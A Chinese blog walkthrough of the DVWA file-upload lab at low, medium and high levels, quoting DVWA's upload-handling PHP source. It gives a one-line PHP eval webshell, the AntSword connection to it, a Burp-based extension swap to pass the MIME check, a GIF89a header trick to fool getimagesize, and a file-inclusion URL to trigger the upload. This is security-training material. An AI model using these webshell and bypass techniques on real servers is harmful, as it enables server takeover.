File Upload

过期的秋刀鱼-2023-08-17 21:01

File Upload

文件上传功能是大部分WEB应用的常用功能,网站允许用户自行上传头像、照片、一些服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图片展示商品情况等。然而,看似不起眼的文件上传功能如果没有做好安全防护措施,就存在巨大的安全风险。

当用户在在文件上传的功能模块处上传文件时,如果WEB应用在文件上传过程中没有对文件的安全性进行有效的校验,攻击者可以通过上传WEBshell等恶意文件对服务器进行攻击,这种情况下认为系统存在文件上传漏洞,根据上传后文件存放位置不同,上传后对文件操作不用,可能会导致不一样的结构,包括完全控制系统,覆盖服务器文件等等。

文件上传漏洞与SQL注入或XSS相比,其风险更大。文件上传漏洞的利用分两步,第一需要能上传恶意文件,第二,恶意文件需要被触发,通过服务端自动运行触发或者攻击者配合其他漏洞手动触发。

LOW级别

php 复制代码 
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 表示上传文件路径

$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 表示 文件名= 上传文件的路径+文件名

函数解释:

basename()函数

$_FILES函数

写一个一句话木马

php 复制代码 
<?php   @eval($_POST['hello']);  ?>

上传成功,给出了上传文件路径,

使用蚁剑连接一句话木马

http://192.168.80.145/dvwa/hackable/uploads/1.php

蚁剑连接成功

Medium级别

直接上传1.php,提示上传失败,只能上传文件类型为JPEG和PNG格式的文件

查看源码发现增加了校验

修改1.php后缀为png格式,

打开bp进行抓包查看

发送到Repeater,将后缀再改回php后缀 ,点send,从response中可以看到文件上传成功,并返回了保存路径。

蚁剑连接一句话木马

http://192.168.80.145/dvwa/hackable/uploads/1.php


High级别

substr () 函数: 点这里
strrpos () 函数: 点这里
strtolower () 函数: 点这里
getimagesize 函数: 点这里

后缀限制只能上传图片,大小10000B,strtolower()函数将无论是大写或小写的后缀名全改为小写,以防大小写绕过,并且getimagesize() 函数用于获取图像大小及相关信息,所以这里再用之前的php文件后缀名改为jpg或png就不可行了,不过也可以利用这个函数的漏洞进行绕过,既然对文件的开头内容进行了检测并且通过二进制识别是否为图像,那么就可以利用文件头欺骗,来让getimagesize()函数检测无效。

这里用GIF的文件头,在一句话木马前加上GIF的文件头标识,后缀改为png格式

php 复制代码 
GIF89a
<?php phpinfo(); ?> <? phpinfo();?>

上传成功

利用文件包含漏洞

php 复制代码 
http://192.168.80.145/dvwa/vulnerabilities/fi/?page=file://C:\phpstudy_pro\WWW\dvwa\hackable\uploads\demo.png
相关推荐
luo_guibin2 个月前
VMware搭建DVWA靶场
dvwa·搭建靶场
玥轩_5212 个月前
网络安全 DVWA通关指南 DVWA Weak Session IDs(弱会话)
安全·web安全·网络安全·靶场·系统安全·dvwa·弱会话
玥轩_5212 个月前
网络安全 DVWA通关指南 DVWA Stored Cross Site Scripting (存储型 XSS)
安全·web安全·网络安全·php·xss·dvwa
玥轩_5212 个月前
网络安全 DVWA通关指南 DVWA SQL Injection (Blind SQL盲注)
sql·安全·web安全·网络安全·dvwa·sql盲注
Sol_94 个月前
W1R3S靶机全通详细教程
网络安全·渗透·靶机
Xlucas4 个月前
DVWA中命令执行漏洞细说
dvwa·命令执行漏洞
玥轩_5214 个月前
网络安全 DVWA通关指南 DVWA Brute Force (爆破)
android·安全·web安全·网络安全·密码学·dvwa·爆破
穿鞋子泡脚4 个月前
sql注入-报错注入
数据库·sql·web安全·渗透测试·dvwa
满心欢喜love5 个月前
dc-3靶机渗透
sql·渗透测试·靶机
玥轩_5215 个月前
网络安全 DVWA通关指南 Cross Site Request Forgery (CSRF)
安全·web安全·网络安全·靶场·csrf·dvwa·dvwa通关指南
热门推荐
01(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明02PyTorch机器学习实现液态神经网络03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04玄机平台应急响应—webshell查杀05Coze扣子平台完整体验和实践(附国内和国际版对比)06Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO07怎样让音频速度变慢?请跟随以下方法进行操作08Unity中PICO实现 隔空取物 和 接触抓取物体09RAG 实践- Ollama+RagFlow 部署本地知识库10【目标跟踪】相机运动补偿